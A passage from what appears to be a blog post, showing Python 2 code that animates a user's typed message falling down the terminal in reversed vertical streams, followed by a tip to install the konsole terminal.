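    def set_vertical(self, x, y, string):
        """Write ``string`` into column ``x``, one character per row, from row ``y``.

        The text is reversed before drawing, so its last character lands on
        row ``y`` and its first character on the lowest row used. Coordinates
        are clamped or clipped so a message may be partly above, below or
        right of the screen without error:
          * a negative ``x`` counts back from the right edge (``width + x``),
          * ``x >= width`` is pinned to the last column,
          * rows above 0 and at or below ``height`` are dropped.
        """
        string = string[::-1]
        if x < 0:
            # Wrap from the right edge using the real width (was hard-coded 80).
            x = self.width + x
        if x >= self.width:
            x = self.width - 1
        if y < 0:
            string = string[abs(y):]
            y = 0
        if y + len(string) > self.height:
            string = string[0:self.height - y]
        if y >= self.height:
            return
        # Stride through the flat buffer by one full row per character.
        start = y * self.width + x
        stop = self.width * (y + len(string))
        self[start:stop:self.width] = string

    def __str__(self):
        """Return the buffer as one string (rows concatenated in order)."""
        return ''.join(self)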

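i_message = raw_input("Input a message: ")
# The first copy falls as typed; every later copy is spawned reversed, and
# since set_vertical reverses its input before drawing, those copies read
# top-to-bottom as typed.
messages = [message(i_message, random.randint(1, 5))]
try:
    for t in xrange(1000000):
        messages.append(message(i_message[::-1], random.randint(1, 5)))
        # A fresh buffer each frame also re-reads the terminal size.
        d = display()
        for text in messages:
            d.set_vertical(text.x, text.y, text)
            text.move()
        # set_vertical ignores rows at or below the bottom edge, and y only
        # grows, so copies that scrolled off are never drawn again; drop them
        # or the list grows by one every frame for the whole run.
        messages = [text for text in messages if text.y < d.height]
        sys.stdout.write(str(d))
        sys.stdout.flush()
        time.sleep(0.1)
except KeyboardInterrupt:
    # Ctrl-C is the normal way to stop the animation; exit without a traceback.
    pass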

Belajar Membuat Website dengan Adobe Dreamweaver

For the best view, install konsole on your system;
to get it, just type: sudo apt-get install konsole

and here example